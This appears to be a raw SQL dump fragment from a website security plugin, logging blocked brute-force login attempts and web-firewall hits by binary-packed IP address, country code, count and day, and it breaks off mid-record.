('\0\0\0\0\0\0\0\0\0\0b7','US',1,19734,'brute'),('\0\0\0\0\0\0\0\0\0\03[<','FR',1,19734,'brute'),('\0\0\0\0\0\0\0\0\0\03ޞ','CA',1,19734,'waf'),('\0\0\0\0\0\0\0\0\0\0ǽ{','CA',1,19734,'brute'),('\0\0\0\0\0\0\0\0\0\0՘','NL',1,19734,'brute'),('\0\0\0\0\0\0\0\0\0\0>Ab','SK',1,19734,'brute'),('\0\0\0\0\0\0\0\0\0\0[y[','FR',1,19734,'brute'),('\0\0\0\0\0\0\0\0\0\0z\"','CN',1,19734,'brute'),('\0\0\0\0\0\0\0\0\0\0D4$','US',1,19734,'brute'),('\0\0\0\0\0\0\0\0\0\0[\\j','BG',1,19734,'waf'),('\0\0\0\0\0\0\0\0\0\0Y\'m','RO',1,19734,'brute'),('\0\0\0\0\0\0\0\0\0\0`','US',1,19734,'brute'),('\0\0\0\0\0\0\0\0\0\0c','US',1,19734,'brute'),('\0\0\0\0\0\0\0\0\0\0gm','ID',1,19734,'brute'),('\0\0\0\0\0\0\0\0\0\0C','US',1,19734,'brute'),('\0\0\0\0\0\0\0\0\0\0$','US',1,19734,'brute'),('\0\0\0\0\0\0\0\0\0\03k','FR',1,19734,'brute'),('\0\0\0\0\0\0\0\0\0\0Y','RS',1,19734,'brute'),('\0\0\0\0\0\0\0\0\0\0k','LU',1,19734,'brute'),('&S\01\0\0\0\0\0\0\0&','CA',1,19734,'brute'),('\0\0\0\0\0\0\0\0\0\0՘','NL',1,19734,'brute'),('\0\0\0\0\0\0\0\0\0\0E','CA',1,19734,'brute'),('\0\0\0\0\0\0\0\0\0\0g','VN',1,19734,'brute'),('\0\0\0\0\0\0\0\0\0\0&\r}','HK',2,19734,'waf'),('\0\0\0\0\0\0\0\0\0\0j&','FR',1,19734,'brute'),('$\0a\0\0\0\0\0\0z ','IN',1,19734,'brute'),('\0\0\0\0\0\0\0\0\0\0. ','RU',2,19734,'waf'),('\0\0\0\0\0\0\0\0\0\0:','SG',2,19734,'brute'),('\0\0\0\0\0\0\0\0\0\0M','US',1,19734,'brute'),('\0\0\0\0\0\0\0\0\0\0]','CA',2,19734,'brute'),(' A.\0\0\0\0\0\0\0\0','FR',1,19734,'brute'),('\0\0\0\0\0\0\0\0\0\0A','IN',1,19734,'brute'),('\0\0\0\0\0\0\0\0\0\0\0x','GB',1,19734,'brute'),('\0\0\0\0\0\0\0\0\0\0k','LU',1,19734,'brute'),('\0\0\0\0\0\0\0\0\0\09','US',1,19734,'brute'),('\0\0\0\0\0\0\0\0\0\0m<','US',1,19734,'brute'),('\0\0\0\0\0\0\0\0\0\0^@x','BG',2,19734,'waf'),('\0\0\0\0\0\0\0\0\0\0 ','US',15,19734,'waf'),('\0\0\0\0\0\0\0\0\0\0K*','DE',1,19734,'brute'),('\0\0\0\0\0\0\0\0\0\0WE','CO',1,19734,'brute'),('\0\0\0\0\0\0\0\0\0\0]Z','GB',1,19734,'brute'),('\0\0\0\0\0\0\0\0\0\02tf','US',2,19734,'brute'),('\0\0\0\0\0\0\0\0\0\0[9s','BE',1,19734,'brute'),('&\0\0Fp\0\0\0\0\0\0\0.','US',1,19734,'brute'),('\0\0\0\0\0\0\0\0\0\0]Z','GB',2,19734,'waf'),('\0\0\0\0\0\0\0\0\0\0h+','DK',1,19734,'brute'),('\0\0\0\0\0\0\0\0\0\0','JP',1,19734,'brute'),('\0\0\0\0\0\0\0\0\0\0-wR4','VN',1,19734,'brute'),('*q\0\0\0\0\0\0\0','ES',1,19734,'brute'),('\0\0\0\0\0\0\0\0\0\0AlmW','FI',1,19734,'brute'),('\0\0\0\0\0\0\0\0\0\0б','FR',1,19734,'brute'),('\0\0\0\0\0\0\0\0\0\0q','DE',1,19734,'brute'),('\0\0\0\0\0\0\0\0\0\0^E8','FR',1,19733,'brute'),('\0\0\0\0\0\0\0\0\0\0[\\','BG',1,19733,'waf'),('\0\0\0\0\0\0\0\0\0\0.i','FR',1,19733,'brute'),('\0\0\0\0\0\0\0\0\0\03XO','FR',1,19733,'brute'),('\0\0\0\0\0\0\0\0\0\0F=','GB',1,19733,'brute'),('*\"\0\0\0\0\0\0\0','DE',1,19733,'brute'),('\0\0\0\0\0\0\0\0\0\0','CZ',1,19733,'brute'),('\0\0\0\0\0\0\0\0\0\0t','RO',1,19733,'brute'),('*\0\0\0\0\"','DE',1,19733,'brute'),('\0\0\0\0\0\0\0\0\0\0Y','SG',1,19733,'brute'),('\0\0\0\0\0\0\0\0\0\0[\\','BG',2,19733,'waf'),('\0\0\0\0\0\0\0\0\0\0','PL',1,19733,'brute'),('\0\0\0\0\0\0\0\0\0\0','IN',1,19733,'brute'),('\0\0\0\0\0\0\0\0\0\0\"KA','US',1,19733,'brute'),('\0\0\0\0\0\0\0\0\0\0՘','NL',1,19733,'brute'),(' A%E\0\0\0\0\0\0\0\0','FR',1,19733,'brute'),('\0\0\0\0\0\0\0\0\0\0PzX','AT',1,19733,'brute'),('\0\0\0\0\0\0\0\0\0\0<','CH',1,19733,'brute'),('\0\0\0\0\0\0\0\0\0\0ٵ','CA',1,19733,'brute'),('\0\0\0\0\0\0\0\0\0\0՘','NL',1,19733,'brute'),('\0\0\0\0\0\0\0\0\0\0Y(7','RO',1,19733,'brute'),('\0\0\0\0\0\0\0\0\0\0M','US',1,19733,'brute'),('\0\0\0\0\0\0\0\0\0\0R\\','CA',1,19733,'brute'),('\0\0\0\0\0\0\0\0\0\0ޡ','NL',1,19733,'brute'),('\0\0\0\0\0\0\0\0\0\0b3a','US',2,19733,'brute'),('\0\0\0\0\0\0\0\0\0\0^@w','BG',4,19733,'waf'),('\0\0\0\0\0\0\0\0\0\0Y6','SG',1,19733,'waf'),('\0\0\0\0\0\0\0\0\0\0kv','LU',1,19733,'brute'),('\0\0\0\0\0\0\0\0\0\0j&','FR',1,19733,'brute'),('\0\0\0\0\0\0\0\0\0\01Q','CN',1,19733,'brute'),('\0\0\0\0\0\0\0\0\0\0٫d','NO',1,19733,'brute'),('\0\0\0\0\0\0\0\0\0\0A','IN',1,19733,'brute'),('\0\0\0\0\0\0\0\0\0\0_4','ES',1,19733,'brute'),('\0\0\0\0\0\0\0\0\0\06','DE',1,19733,'brute'),('\0\0\0\0\0\0\0\0\0\0^','FR',1,19733,'brute'),('\0\0\0\0\0\0\0\0\0\0W-#','HU',1,19733,'brute'),('\0\0\0\0\0\0\0\0\0\0Wa','RU',1,19733,'brute'),('\0\0\0\0\0\0\0\0\0\0','NL',1,19733,'brute'),('\0\0\0\0\0\0\0\0\0\0^@x','BG',2,19733,'waf'),('\0\0\0\0\0\0\0\0\0\0Hӱ','SG',1,19733,'brute'),('\0\0\0\0\0\0\0\0\0\0^E$','BG',1,19733,'waf'),('\0\0\0\0\0\0\0\0\0\0Y\'m','RO',1,19733,'brute'),('\0\0\0\0\0\0\0\0\0\0#','CH',1,19733,'brute'),('\0\0\0\0\0\0\0\0\0\0G','CN',1,19733,'brute'),('\0\0\0\0\0\0\0\0\0\0Y~','RU',1,19733,'brute'),('&-\0\0\0\0\0\0\0L','US',1,19733,'brute'),('\0\0\0\0\0\0\0\0\0\0RK','ES',1,19733,'brute'),('\0\0\0\0\0\0\0\0\0\0z','US',1,19733,'brute'),(' A\0\0\0\0\0\0\0\0\0','FR',1,19733,'brute'),('\0\0\0\0\0\0\0\0\0\0э\"*','US',1,19733,'brute'),('\0\0\0\0\0\0\0\0\0\0EY','US',1,19733,'brute'),('\0\0\0\0\0\0\0\0\0\0@','IN',1,19733,'brute'),('\0\0\0\0\0\0\0\0\0\0՘h','NL',1,19733,'brute'),('\0\0\0\0\0\0\0\0\0\03k','FR',1,19733,'brute'),('\0\0\0\0\0\0\0\0\0\02tf','US',4,19733,'brute'),('\0\0\0\0\0\0\0\0\0\0E7D','US',1,19733,'brute'),('*PT\0e','NL',1,19733,'brute'),('\0\0\0\0\0\0\0\0\0\0_a\Z','CZ',1,19733,'brute'),('\0\0\0\0\0\0\0\0\0\0k','LU',1,19733,'brute'),('\0\0\0\0\0\0\0\0\0\0\\P','US',1,19733,'brute'),('\0\0\0\0\0\0\0\0\0\0','US',1,19733,'brute'),('$\0\0830\06','JP',1,19733,'brute'),(' A\0\0\0\0\0\0\0\0','FR',1,19733,'brute'),('\0\0\0\0\0\0\0\0\0\0\\J','FR',1,19733,'brute'),(' |!\0\0\0\0\0\0\0\0','UA',1,19733,'brute'),('\0\0\0\0\0\0\0\0\0\03[<','FR',1,19733,'brute'),('\0\0\0\0\0\0\0\0\0\0F=','GB',1,19733,'brute'),('\0\0\0\0\0\0\0\0\0\0[\\','BG',1,19733,'waf'),('*\0\0\0\0\0\0\0\0\0','UA',2,19733,'brute'),('\0\0\0\0\0\0\0\0\0\02p','US',2,19733,'brute'),('\0\0\0\0\0\0\0\0\0\0k','US',1,19733,'brute'),('\0\0\0\0\0\0\0\0\0\0','NL',1,19733,'brute'),(' A\0\0\0\0\0\0\0\0\0','FR',1,19733,'brute'),('\0\0\0\0\0\0\0\0\0\0','NL',1,19733,'brute'),('\0\0\0\0\0\0\0\0\0\0U[','BG',1,19733,'brute'),('\0\0\0\0\0\0\0\0\0\0FL+','JP',1,19733,'brute'),('\0\0\0\0\0\0\0\0\0\0q','DE',1,19733,'brute'),('\0\0\0\0\0\0\0\0\0\09','DE',2,19733,'brute'),(' A\0$T\0\0\0\0\0\0\0\0','FR',1,19733,'brute'),('\0\0\0\0\0\0\0\0\0\0q+','JP',1,19733,'brute'),('\0\0\0\0\0\0\0\0\0\0b0','US',1,19733,'brute'),('\0\0\0\0\0\0\0\0\0\0٠\'','DE',1,19733,'waf'),('&\0\0\0\0\0\04\0','US',1,19733,'brute'),('\0\0\0\0\0\0\0\0\0\0э-','US',1,19733,'brute'),('\0\0\0\0\0\0\0\0\0\03ޞ','CA',2,19733,'waf'),(' A\0>\0\0\0\0\0\0\0\0','FR',1,19733,'brute'),('\0\0\0\0\0\0\0\0\0\0Uu','NL',1,19733,'brute'),('&S\01\0\0\0\0\0\0\0&','CA',2,19733,'brute'),('*cC\0 fC','NL',1,19733,'brute'),('\0\0\0\0\0\0\0\0\0\0Y+','GB',1,19733,'brute'),(' &G\0\0\0\0\0\0&G','UA',2,19733,'waf'),('\0\0\0\0\0\0\0\0\0\0','IN',2,19733,'brute'),('\0\0\0\0\0\0\0\0\0\0n+','DE',1,19733,'brute'),('\0\0\0\0\0\0\0\0\0\0b8','US',2,19733,'brute'),('\0\0\0\0\0\0\0\0\0\0-=','US',1,19733,'brute'),('\0\0\0\0\0\0\0\0\0\0 ','IN',1,19733,'brute'),('\0\0\0\0\0\0\0\0\0\0','DE',10,19733,'waf'),('\0\0\0\0\0\0\0\0\0\0G\r','US',1,19733,'brute'),('\0\0\0\0\0\0\0\0\0\08','SG',1,19733,'brute'),('\0\0\0\0\0\0\0\0\0\0m<','US',1,19733,'brute'),('$\0~+\0cW','AU',1,19733,'brute'),('\0\0\0\0\0\0\0\0\0\0k','US',1,19733,'brute'),('\0\0\0\0\0\0\0\0\0\0[8','US',1,19733,'brute'),(' A\0O\0\0\0\0\0\0\0\0','FR',2,19733,'brute'),('\0\0\0\0\0\0\0\0\0\0[\\','BG',4,19733,'brute'),('\0\0\0\0\0\0\0\0\0\0Ո]','DE',1,19732,'brute'),('\0\0\0\0\0\0\0\0\0\0','DE',1,19732,'brute'),('\0\0\0\0\0\0\0\0\0\0@c','NL',1,19732,'brute'),('\0\0\0\0\0\0\0\0\0\0+?','CN',1,19732,'brute'),('\0\0\0\0\0\0\0\0\0\0Jl','US',1,19732,'brute'),('\0\0\0\0\0\0\0\0\0\0','DE',1,19732,'brute'),('\0\0\0\0\0\0\0\0\0\0','PL',1,19732,'brute'),('*\08\0\0\0\0\0\0\0\0\0\0\0','NL',1,19732,'brute'),('\0\0\0\0\0\0\0\0\0\0э\"*','US',1,19732,'brute'),('\0\0\0\0\0\0\0\0\0\0k','US',1,19732,'brute'),('\0\0\0\0\0\0\0\0\0\0[\\j','BG',4,19732,'waf'),('\0\0\0\0\0\0\0\0\0\0QF','CN',1,19732,'brute'),('\0\0\0\0\0\0\0\0\0\0MD]','GB',1,19732,'brute'),('\0\0\0\0\0\0\0\0\0\0%\rQ','NL',1,19732,'brute'),('\0\0\0\0\0\0\0\0\0\0K','CA',1,19732,'brute'),('\0\0\0\0\0\0\0\0\0\0՘','NL',1,19732,'brute'),('\0\0\0\0\0\0\0\0\0\0K֣','CA',1,19732,'brute'),('\0\0\0\0\0\0\0\0\0\0eD\'','US',1,19732,'brute'),('\0\0\0\0\0\0\0\0\0\0>f','SE',1,19732,'brute'),('\0\0\0\0\0\0\0\0\0\03j','CA',1,19732,'brute'),('\0\0\0\0\0\0\0\0\0\0ν;','DE',1,19732,'brute'),('\0\0\0\0\0\0\0\0\0\0u','ES',1,19732,'brute'),('\0\0\0\0\0\0\0\0\0\0`','US',1,19732,'brute'),('\0\0\0\0\0\0\0\0\0\0՘','NL',1,19732,'brute'),('\0\0\0\0\0\0\0\0\0\0','NL',1,19732,'brute'),('\0\0\0\0\0\0\0\0\0\0\"A\0','CH',1,19732,'brute'),('\0\0\0\0\0\0\0\0\0\0j&','FR',1,19732,'brute'),('\0\0\0\0\0\0\0\0\0\0Vh','DE',1,19732,'brute'),('\0\0\0\0\0\0\0\0\0\0-N','IR',1,19732,'brute'),('\0\0\0\0\0\0\0\0\0\0э1q','US',1,19732,'brute'),('\0\0\0\0\0\0\0\0\0\0G5N','US',1,19732,'brute'),('\0\0\0\0\0\0\0\0\0\0[\\','BG',4,19732,'waf'),('\0\0\0\0\0\0\0\0\0\0t','RO',1,19732,'brute'),('*\0@\0\0\0\0\0\0Im','RU',1,19732,'brute'),('\0\0\0\0\0\0\0\0\0\0M','US',2,19732,'brute'),('\0\0\0\0\0\0\0\0\0\0k','LU',2,19732,'brute'),('\0\0\0\0\0\0\0\0\0\0dM','US',1,19732,'brute'),('\0\0\0\0\0\0\0\0\0\0٪','NO',1,19732,'brute'),('\0\0\0\0\0\0\0\0\0\0B','SG',1,19732,'brute'),('\0\0\0\0\0\0\0\0\0\03ޞ','CA',2,19732,'waf'),('\0\0\0\0\0\0\0\0\0\0z','US',1,19732,'brute'),('\0\0\0\0\0\0\0\0\0\0\\̊','US',1,19732,'brute'),('\0\0\0\0\0\0\0\0\0\0D','IN',1,19732,'brute'),('\0\0\0\0\0\0\0\0\0\0v','US',1,19732,'brute'),('\0\0\0\0\0\0\0\0\0\0-=s','US',1,19732,'brute'),(' A9\0\0\0\0\0\0\0\0','FR',1,19732,'brute'),('\0\0\0\0\0\0\0\0\0\0q+','JP',1,19732,'brute'),('\0\0\0\0\0\0\0\0\0\0҄!','AR',1,19732,'brute'),('*\0\0\0\0\"','DE',2,19732,'brute'),('\0\0\0\0\0\0\0\0\0\0n','ES',2,19732,'brute'),('\0\0\0\0\0\0\0\0\0\0Uu','NL',1,19732,'brute'),('\0\0\0\0\0\0\0\0\0\0J','US',2,19732,'brute'),('\0\0\0\0\0\0\0\0\0\0>f','SE',1,19732,'brute'),('\0\0\0\0\0\0\0\0\0\0\"]B','IN',1,19732,'brute'),('\0\0\0\0\0\0\0\0\0\0>B','GB',1,19732,'brute'),('\0\0\0\0\0\0\0\0\0\0^@w','BG',59,19732,'waf'),('\0\0\0\0\0\0\0\0\0\0#Ǽ','US',1,19732,'brute'),('\0\0\0\0\0\0\0\0\0\0n','ID',1,19732,'brute'),('\0\0\0\0\0\0\0\0\0\0K','CA',1,19732,'brute'),('\0\0\0\0\0\0\0\0\0\0} ','FR',2,19732,'brute'),('\0\0\0\0\0\0\0\0\0\0Y','IN',1,19732,'brute'),('$\0a\0\0\0\0\0\0\0m','SG',1,19732,'brute'),('\0\0\0\0\0\0\0\0\0\0','NL',1,19732,'brute'),('\0\0\0\0\0\0\0\0\0\0 ','IN',1,19732,'brute'),('\0\0\0\0\0\0\0\0\0\0#\'','GB',1,19732,'brute'),(' A\0:e\0\0\0\0\0\0\0\0','GB',1,19732,'brute'),('\0\0\0\0\0\0\0\0\0\0','DE',2,19732,'waf'),('\0\0\0\0\0\0\0\0\0\0','US',1,19732,'brute'),('\0\0\0\0\0\0\0\0\0\0э9W','US',2,19732,'brute'),('*\0\Z(]\0\0\0\0\0\0\0','SE',1,19732,'brute'),('\0\0\0\0\0\0\0\0\0\0U[','BG',1,19732,'brute'),('*\0:@A\0\0\0\0\0\0\0','DE',1,19732,'brute'),('\0\0\0\0\0\0\0\0\0\0^','FR',2,19732,'brute'),('\0\0\0\0\0\0\0\0\0\03','CH',1,19732,'brute'),('\0\0\0\0\0\0\0\0\0\0@','IN',1,19732,'brute'),('\0\0\0\0\0\0\0\0\0\0:N','SG',1,19732,'brute'),('*\0i\ZP\0\0\0\0\0\0\0\0','FR',1,19732,'brute'),('\0\0\0\0\0\0\0\0\0\0S#@','DE',1,19732,'brute'),('\0\0\0\0\0\0\0\0\0\0.w','GB',2,19732,'waf'),('\0\0\0\0\0\0\0\0\0\0#8','GB',1,19732,'brute'),('&S\01\0\0\0\0\0\0\0&','CA',3,19732,'brute'),('\0\0\0\0\0\0\0\0\0\0 m','US',1,19732,'brute'),('\0\0\0\0\0\0\0\0\0\0\\?Α','UZ',1,19732,'brute'),('&\0\0}\0Un{Lˬ','US',3,19732,'waf'),('  \0\0\0\0\0\0\0\0\0','ES',1,19732,'brute'),('\0\0\0\0\0\0\0\0\0\0͹ul','US',1,19732,'brute'),('\0\0\0\0\0\0\0\0\0\03k','FR',1,19732,'brute'),('\0\0\0\0\0\0\0\0\0\0s','HK',1,19732,'brute'),('\0\0\0\0\0\0\0\0\0\02tf','US',2,19732,'brute'),('\0\0\0\0\0\0\0\0\0\0RL','ES',1,19732,'brute'),('\0\0\0\0\0\0\0\0\0\0=&','IN',2,19732,'brute'),('\0\0\0\0\0\0\0\0\0\0Y','CZ',1,19732,'brute'),('\0\0\0\0\0\0\0\0\0\0v','SG',1,19732,'brute'),('\0\0\0\0\0\0\0\0\0\0','NL',1,19732,'brute'),('\0\0\0\0\0\0\0\0\0\0p ','DE',1,19732,'brute'),('\0\0\0\0\0\0\0\0\0\0H','US',1,19732,'brute'),('\0\0\0\0\0\0\0\0\0\0|!','PK',2,19732,'brute'),('\0\0\0\0\0\0\0\0\0\0/k','CN',1,19732,'brute'),('\0\0\0\0\0\0\0\0\0\0hZ','CA',1,19732,'brute'),('\0\0\0\0\0\0\0\0\0\0[\\','BG',232,19732,'brute'),('\0\0\0\0\0\0\0\0\0\0k','US',1,19731,'brute'),('\0\0\0\0\0\0\0\0\0\0hZ','CA',1,19731,'brute'),('\0\0\0\0\0\0\0\0\0\0} ','FR',1,19731,'brute'),('\0\0\0\0\0\0\0\0\0\0ν;','DE',1,19731,'brute'),('* 1\0\0\0\0\0\0\0\0\0','NL',1,19731,'brute'),('\0\0\0\0\0\0\0\0\0\0J','US',1,19731,'brute'),('\0\0\0\0\0\0\0\0\0\0>f','SE',1,19731,'brute'),('\0\0\0\0\0\0\0\0\0\0^i','IE',1,19731,'brute'),('\0\0\0\0\0\0\0\0\0\0%-','FR',1,19731,'brute'),('\0\0\0\0\0\0\0\0\0\0B','FR',1,19731,'brute'),('\0\0\0\0\0\0\0\0\0\0՘E','NL',1,19731,'brute'),('\0\0\0\0\0\0\0\0\0\0','US',1,19731,'brute'),('\0\0\0\0\0\0\0\0\0\0D#|','US',1,19731,'brute'),('\0\0\0\0\0\0\0\0\0\0[\\','BG',2,19731,'waf'),('\0\0\0\0\0\0\0\0\0\0l','IE',1,19731,'brute'),('\0\0\0\0\0\0\0\0\0\0!','US',1,19731,'brute'),('\0\0\0\0\0\0\0\0\0\0j&','CN',1,19731,'brute'),('\0\0\0\0\0\0\0\0\0\0k','LU',2,19731,'brute'),('\0\0\0\0\0\0\0\0\0\0՘','NL',1,19731,'brute'),('\0\0\0\0\0\0\0\0\0\0~b','SG',1,19731,'brute'),('\0\0\0\0\0\0\0\0\0\0Q','DE',1,19731,'brute'),('\0\0\0\0\0\0\0\0\0\0ٹ','US',2,19731,'brute'),('\0\0\0\0\0\0\0\0\0\0','CZ',1,19731,'brute'),('\0\0\0\0\0\0\0\0\0\0[\\','BG',82,19731,'brute'),('\0\0\0\0\0\0\0\0\0\09\n','NL',1,19731,'brute'),('\0\0\0\0\0\0\0\0\0\0% ','US',1,19731,'brute'),('\0\0\0\0\0\0\0\0\0\0[9s','BE',1,19731,'brute'),('\0\0\0\0\0\0\0\0\0\0E','CA',1,19731,'brute'),('\0\0\0\0\0\0\0\0\0\0 ','IN',1,19731,'brute'),('\0\0\0\0\0\0\0\0\0\0G','SG',1,19731,'waf'),('\0\0\0\0\0\0\0\0\0\0zb','GB',1,19731,'brute'),('\0\0\0\0\0\0\0\0\0\0-=E','US',1,19731,'brute'),('&\0<\0\0\0\0<','US',1,19731,'brute'),('\0\0\0\0\0\0\0\0\0\0^E$','BG',4,19731,'waf'),('* `v@\0\0\0\0\0\0\0','DE',1,19731,'brute'),('\0\0\0\0\0\0\0\0\0\0c[','US',1,19731,'brute'),('\0\0\0\0\0\0\0\0\0\0.','CN',2,19731,'brute'),('\0\0\0\0\0\0\0\0\0\0$','US',1,19731,'brute'),('\0\0\0\0\0\0\0\0\0\0?G3','CA',1,19731,'brute'),('\0\0\0\0\0\0\0\0\0\0aJ[Z','US',1,19731,'brute'),('\0\0\0\0\0\0\0\0\0\0E','US',1,19731,'brute'),('\0\0\0\0\0\0\0\0\0\06%','FR',1,19731,'brute'),('*\0\Z(]\0\0\0\0\0\0\0','SE',1,19731,'brute'),('\0\0\0\0\0\0\0\0\0\02tf','US',1,19731,'brute'),('\0\0\0\0\0\0\0\0\0\0z{','US',1,19731,'brute'),('\0\0\0\0\0\0\0\0\0\0#`','US',1,19731,'brute'),('\0\0\0\0\0\0\0\0\0\0i','ID',1,19731,'brute'),('\0\0\0\0\0\0\0\0\0\0n','ID',2,19731,'brute'),('\0\0\0\0\0\0\0\0\0\0','ID',1,19731,'brute'),('&\0\0@','US',1,19731,'brute'),('\0\0\0\0\0\0\0\0\0\0L','DE',2,19731,'brute'),('&\0\0\0\0\0\0 ','US',1,19731,'brute'),('\0\0\0\0\0\0\0\0\0\0]/u','IT',1,19731,'brute'),('\0\0\0\0\0\0\0\0\0\0Y','CZ',1,19731,'brute'),('\0\0\0\0\0\0\0\0\0\0','PL',2,19731,'brute'),('\0\0\0\0\0\0\0\0\0\0xM#','CN',1,19731,'brute'),('\0\0\0\0\0\0\0\0\0\0يk','US',1,19731,'brute'),('\0\0\0\0\0\0\0\0\0\0h-','DE',1,19731,'brute'),('\0\0\0\0\0\0\0\0\0\0&)','US',1,19731,'waf'),('\0\0\0\0\0\0\0\0\0\0\0[','VN',2,19731,'brute'),('\0\0\0\0\0\0\0\0\0\0 8f','IR',1,19731,'brute'),('\0\0\0\0\0\0\0\0\0\06|','US',1,19731,'brute'),('\0\0\0\0\0\0\0\0\0\0̼','US',2,19731,'brute'),('\0\0\0\0\0\0\0\0\0\0՘','NL',1,19731,'brute'),('\0\0\0\0\0\0\0\0\0\0','DE',2,19731,'waf'),('\0\0\0\0\0\0\0\0\0\0j&','FR',3,19731,'brute'),('* h1g\0\0\0\0\0\0\0','DE',1,19731,'brute'),('\0\0\0\0\0\0\0\0\0\0%','UZ',1,19731,'brute'),(' A\0\0\0\0\0\0\0\0','FR',1,19731,'brute'),('\0\0\0\0\0\0\0\0\0\0@','IN',2,19731,'brute'),('\0\0\0\0\0\0\0\0\0\0]','IN',1,19731,'brute'),('\0\0\0\0\0\0\0\0\0\0v','SG',2,19731,'brute'),('\0\0\0\0\0\0\0\0\0\0b2b','US',1,19731,'brute'),('\0\0\0\0\0\0\0\0\0\0»','BE',1,19731,'brute'),('\0\0\0\0\0\0\0\0\0\0N.','DE',1,19731,'brute'),('\0\0\0\0\0\0\0\0\0\03','FR',1,19731,'brute'),('&\0\0\0\0\0\0$\0','US',1,19731,'brute'),('\0\0\0\0\0\0\0\0\0\0՘','NL',1,19731,'brute'),('\0\0\0\0\0\0\0\0\0\0','NL',1,19731,'brute'),(' A9\0\0\0\0\0\0\0\0','FR',2,19731,'brute'),('\0\0\0\0\0\0\0\0\0\0h','US',1,19731,'brute'),('\0\0\0\0\0\0\0\0\0\0','SG',1,19731,'brute'),('\0\0\0\0\0\0\0\0\0\0>B','GB',1,19731,'brute'),('*@\0\0aj:\0\0\0\0\0P','DE',1,19731,'brute'),(' A\0>\0\0\0\0\0\0\0\0','FR',1,19731,'brute'),('\0\0\0\0\0\0\0\0\0\0Ո]','DE',2,19731,'brute'),('\0\0\0\0\0\0\0\0\0\0б','FR',2,19731,'brute'),('\0\0\0\0\0\0\0\0\0\0ٵ','CA',1,19731,'brute'),('\0\0\0\0\0\0\0\0\0\0NAH','IT',1,19731,'brute'),('\0\0\0\0\0\0\0\0\0\0','US',1,19731,'brute'),('\0\0\0\0\0\0\0\0\0\0M','US',1,19731,'brute'),('\0\0\0\0\0\0\0\0\0\0g','HK',1,19731,'brute'),('\0\0\0\0\0\0\0\0\0\0-N','IR',1,19731,'brute'),('\0\0\0\0\0\0\0\0\0\0k','LU',1,19731,'brute'),('\0\0\0\0\0\0\0\0\0\0)3','ZA',1,19731,'brute'),('\0\0\0\0\0\0\0\0\0\0\\','KR',1,19731,'brute'),('\0\0\0\0\0\0\0\0\0\0\rO','IE',3,19731,'brute'),('\0\0\0\0\0\0\0\0\0\0[\\','BG',4,19731,'waf'),('\0\0\0\0\0\0\0\0\0\0','JP',1,19731,'brute'),('\0\0\0\0\0\0\0\0\0\0Y\'m','RO',1,19731,'brute'),('\0\0\0\0\0\0\0\0\0\0F=','GB',1,19731,'brute'),('\0\0\0\0\0\0\0\0\0\0\"KA','US',1,19731,'brute'),('\0\0\0\0\0\0\0\0\0\0','DE',1,19731,'brute'),('\0\0\0\0\0\0\0\0\0\01Q','CN',1,19731,'brute'),('\0\0\0\0\0\0\0\0\0\0Rf','NO',1,19731,'brute'),('\0\0\0\0\0\0\0\0\0\0r&','ID',4,19731,'waf'),('\0\0\0\0\0\0\0\0\0\03','SG',2,19731,'brute'),('\0\0\0\0\0\0\0\0\0\0Wb','FR',1,19731,'brute'),('\0\0\0\0\0\0\0\0\0\0t','RO',2,19731,'brute'),(' A\0$T\0\0\0\0\0\0\0\0','FR',1,19731,'brute'),('\0\0\0\0\0\0\0\0\0\0\\?Α','UZ',1,19731,'brute'),('\0\0\0\0\0\0\0\0\0\0U','NL',1,19731,'brute'),('\0\0\0\0\0\0\0\0\0\0\"A\0','CH',1,19731,'brute'),('\0\0\0\0\0\0\0\0\0\0)ؼ','DE',12,19731,'waf'),('\0\0\0\0\0\0\0\0\0\0͹w','US',1,19731,'brute'),('\0\0\0\0\0\0\0\0\0\0#̬ ','NL',1,19731,'brute'),('\0\0\0\0\0\0\0\0\0\0C','US',1,19731,'brute'),(' A\0\0\0\0\0\0\0\0','FR',1,19730,'brute'),('\0\0\0\0\0\0\0\0\0\0k','US',1,19730,'brute'),('\0\0\0\0\0\0\0\0\0\0','GB',1,19730,'brute'),('\0\0\0\0\0\0\0\0\0\0h','US',1,19730,'brute'),('\0\0\0\0\0\0\0\0\0\0xhx','CN',1,19730,'brute'),('\0\0\0\0\0\0\0\0\0\0k','US',1,19730,'brute'),('\0\0\0\0\0\0\0\0\0\0','NL',1,19730,'brute'),('\0\0\0\0\0\0\0\0\0\0m<','US',1,19730,'brute'),('\0\0\0\0\0\0\0\0\0\0H4^','US',1,19730,'brute'),('\0\0\0\0\0\0\0\0\0\0\\9','AU',1,19730,'brute'),('\0\0\0\0\0\0\0\0\0\0`','US',1,19730,'brute'),('\0\0\0\0\0\0\0\0\0\0%','US',1,19730,'brute'),('\0\0\0\0\0\0\0\0\0\0QF','CN',1,19730,'brute'),('\0\0\0\0\0\0\0\0\0\0bF1U','IN',1,19730,'waf'),('\0\0\0\0\0\0\0\0\0\0#','FR',1,19730,'brute'),('\0\0\0\0\0\0\0\0\0\0M','US',1,19730,'brute'),('\0\0\0\0\0\0\0\0\0\06%','FR',1,19730,'brute'),('\0\0\0\0\0\0\0\0\0\0#B','ID',1,19730,'brute'),('\0\0\0\0\0\0\0\0\0\0э6','US',1,19730,'brute'),('\0\0\0\0\0\0\0\0\0\0b3a','US',1,19730,'brute'),('\0\0\0\0\0\0\0\0\0\0WE','CO',1,19730,'brute'),('\0\0\0\0\0\0\0\0\0\0%\rQ','NL',1,19730,'brute'),('\0\0\0\0\0\0\0\0\0\0[9s','BE',1,19730,'brute'),('\0\0\0\0\0\0\0\0\0\0gK\0','HK',1,19730,'brute'),('\0\0\0\0\0\0\0\0\0\0','NL',1,19730,'brute'),('\0\0\0\0\0\0\0\0\0\0\\P','US',1,19730,'brute'),(' A\0$T\0\0\0\0\0\0\0\0','FR',1,19730,'brute'),('\0\0\0\0\0\0\0\0\0\0&','US',15,19730,'waf'),('\0\0\0\0\0\0\0\0\0\0\\̊','US',1,19730,'brute'),('\0\0\0\0\0\0\0\0\0\03[<','FR',1,19730,'brute'),('\0\0\0\0\0\0\0\0\0\08-','SE',1,19730,'brute'),('\0\0\0\0\0\0\0\0\0\0k','LU',1,19730,'brute'),('*\0\Z(]\0\0\0\0\0\0\0','SE',2,19730,'brute'),('\0\0\0\0\0\0\0\0\0\0#:','BE',1,19730,'brute'),('\0\0\0\0\0\0\0\0\0\0J','US',1,19730,'brute'),('\0\0\0\0\0\0\0\0\0\0b0','US',1,19730,'brute'),('\0\0\0\0\0\0\0\0\0\0','ES',1,19730,'brute'),('\0\0\0\0\0\0\0\0\0\0A','IN',1,19730,'brute'),('\0\0\0\0\0\0\0\0\0\0|!','PK',1,19730,'brute'),('\0\0\0\0\0\0\0\0\